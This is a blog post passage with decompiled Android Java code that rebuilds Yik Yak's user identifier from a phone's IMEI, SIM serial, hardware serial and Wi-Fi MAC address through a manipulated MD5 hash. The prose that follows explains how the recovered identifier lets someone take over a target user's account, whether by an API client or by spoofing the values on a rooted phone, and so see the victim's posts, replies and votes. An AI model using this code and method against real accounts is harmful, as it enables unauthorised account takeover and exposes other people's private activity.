private static char a[] = "0123456789ABCDEF".toCharArray();
public final String generateUserIdentification()
{
String deviceId = "";
String simSerialNumber = "";
String serialNumber = "";
String wifiMacAddress = "";
try
{
deviceId = ((TelephonyManager)getSystemService(Context.TELEPHONY_SERVICE)).getDeviceId();
}
catch (Exception localException1)
{
}
try
{
simSerialNumber = ((TelephonyManager)getSystemService(Context.TELEPHONY_SERVICE)).getSimSerialNumber();
}
catch (Exception localException2)
{
}
try
{
Class localClass = Class.forName("android.os.SystemProperties");
serialNumber = (String)localClass.getMethod("get", new Class[] { String.class }).invoke(localClass, new Object[] { "ro.serialno" });
}
catch (Exception localException3)
{
}
try
{
wifiMacAddress = ((WifiManager)getSystemService(Context.WIFI_SERVICE)).getConnectionInfo().getMacAddress();
}
catch (Exception localException4)
{
}
String userId = md5HashAndManipulate(deviceId + "." + simSerialNumber + "." + wifiMacAddress + "." + serialNumber);
if ((checkIfEmpty(deviceId)) || (checkIfEmpty(serialNumber)) || (deviceId.equals("000000000000000")))
{
return null;
}
return (new StringBuilder()).append(userId.substring(0, 6)).append(userId.substring(5, -1 + userId.length())).toString();
}
public static String md5HashAndManipulate(String paramString)
{
int i = 0;
try
{
MessageDigest localMessageDigest = MessageDigest.getInstance("MD5");
byte[] arrayOfByte1 = paramString.getBytes("UTF-8");
localMessageDigest.update(arrayOfByte1, 0, arrayOfByte1.length);
byte[] arrayOfByte2 = localMessageDigest.digest();
char[] arrayOfChar = new char[2 * arrayOfByte2.length];
while (i < arrayOfByte2.length)
{
int j = 0xFF & arrayOfByte2[i];
arrayOfChar[(i * 2)] = a[(j >>> 4)];
arrayOfChar[(1 + i * 2)] = a[(j & 0xF)];
i++;
}
String str = new String(arrayOfChar);
return str;
}
catch (NoSuchAlgorithmException localNoSuchAlgorithmException)
{
localNoSuchAlgorithmException.printStackTrace();
return null;
}
catch (UnsupportedEncodingException localUnsupportedEncodingException)
{
localUnsupportedEncodingException.printStackTrace();
}
return null;
}
public static boolean checkIfEmpty(String paramString)
{
return (paramString == null) || (paramString.trim().length() == 0);
}
Once the user identity is obtained, the account can be taken over by means described in the Account Takeover section of SilverSky Labs' YikHak exploit (for iPhone), through a Yik Yak API client or spoofing these values on another Android phone (must have root access). A custom Android version of Yik Yak would also work, although it seems as though there is not an existing solution for this avenue. It may be beneficial in providing additional functionality (like Tor integration without root access), but seems to be an unreasonable amount of work for little benefit.
Done successfully, this will give you access to the My Stuff functionality, allowing you to see posted Yaks, Replies, Peeks, voting, et ceterea for the target user.
No comments:
Post a Comment